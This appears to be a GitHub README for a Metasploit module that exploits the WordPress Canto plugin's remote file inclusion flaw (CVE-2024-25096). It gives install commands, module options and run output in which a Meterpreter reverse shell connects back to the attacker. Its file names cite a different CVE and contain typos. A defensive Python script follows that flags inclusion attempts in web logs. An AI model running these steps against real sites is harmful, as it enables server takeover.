puppetma4ster/Metasploit-Wordpress-Canto-Exploit-RCE-CVE-2024-25096
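A Metasploit exploit module for the remote code execution vulnerability in the WordPress Canto plugin; it uses an RFI vulnerability to obtain a Meterpreter session on the server.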
# Metasploit exploit module Canto RCE CVE-2024-25096
This is a proof-of-concept (PoC) exploit for Canto RCE CVE-2024-25096, written for Metasploit.
## Usage
Download the exploit and add it to the Metasploit modules folder.
Reload Metasploit and select a payload.
```
git exploit
cp explit/rce_exploit_cve_2023_3452.rb ~/.msf4/modules/exploits/
msfconsole
reload_all
search rce_exploit_cve_2023_3452
use 0
```
Set the values of the required variables.
```
Module options (exploit/rce_exploit_cve_2023_3452):

   Name        Current Setting            Required  Description
   ----        ---------------            --------  -----------
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
   RHOSTS      192.168.0.3                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8080                       yes       Port
   SRVHOST     0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     9998                       yes       The local port to listen on.
   SSL         false                      yes       Use SSL
   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
   TARGETFILE  get.php                    yes       Vulnerable PHP file
   TARGETURI   /wp-content/plugins/canto  yes       Path to cantos root directory
   URIPATH                                no        The URI to use for this exploit (default is random)
   VHOST                                  no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wordpress cantp plugin <= 3.0.7
```
Run the exploit and good luck ;)
```
[msf](Jobs:1 Agents:0) exploit(my_expi) >> run
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Starting HTTP server...
[*] Using URL: http://192.168.0.2:9998/Rj5Nh2b
[*] Triggering RFI...
[*] 192.168.0.3 my_expi - Sending admin.php payload
[*] Sending stage (42137 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.3:42234) at 2026-02-28 23:40:27 +0100
```
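For the defending side, the following added example (not part of this repository) scans web server access logs for requests to PHP files under the Canto plugin directory whose query parameters carry a remote URL or PHP stream wrapper, which is what a remote file inclusion attempt looks like in a log. Assumptions: the combined access-log format, the include target travelling in the query string, the placeholder parameter name `p`, and the constructed sample lines.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Any PHP file below the plugin root named in the module's TARGETURI option.
PLUGIN_PHP = re.compile(r"/wp-content/plugins/canto/.+\.php$", re.I)
# URL schemes and PHP stream wrappers that have no business in an include path.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php|data|expect)\s*:", re.I)


def _decode(value, rounds=3):
    """Undo nested percent-encoding; bounded so hostile input cannot loop."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(lines):
    """Return (src, path, param, value, status) for each suspicious parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        path = _decode(url.path)
        if not PLUGIN_PHP.search(path):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = _decode(value)  # parse_qsl decoded once; catch double encoding
            if REMOTE_SCHEME.match(value):
                hits.append((m.group("src"), path, name, value, int(m.group("status"))))
    return hits


# Constructed log lines, not real traffic; "p" is a placeholder parameter name.
SAMPLE = [
    '192.168.0.2 - - [28/Feb/2026:23:40:26 +0100] "GET /wp-content/plugins/canto/get.php?p=http%3A%2F%2F192.168.0.2%3A9998%2FRj5Nh2b HTTP/1.1" 200 0',
    '198.51.100.7 - - [28/Feb/2026:23:41:02 +0100] "GET /wp-content/plugins/canto/get.php?p=http%253A%252F%252F198.51.100.7%252Fa HTTP/1.1" 200 0',
    '192.168.0.9 - - [28/Feb/2026:23:42:10 +0100] "GET /wp-content/plugins/canto/get.php?size=100 HTTP/1.1" 200 512',
    '192.168.0.9 - - [28/Feb/2026:23:43:55 +0100] "GET /wp-login.php?redirect_to=https%3A%2F%2Fexample.com%2Fwp-admin%2F HTTP/1.1" 200 4096',
]
if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this check only covers query strings; a hit with status 200 on a plugin version at or below the 3.0.7 listed in the exploit target deserves follow-up.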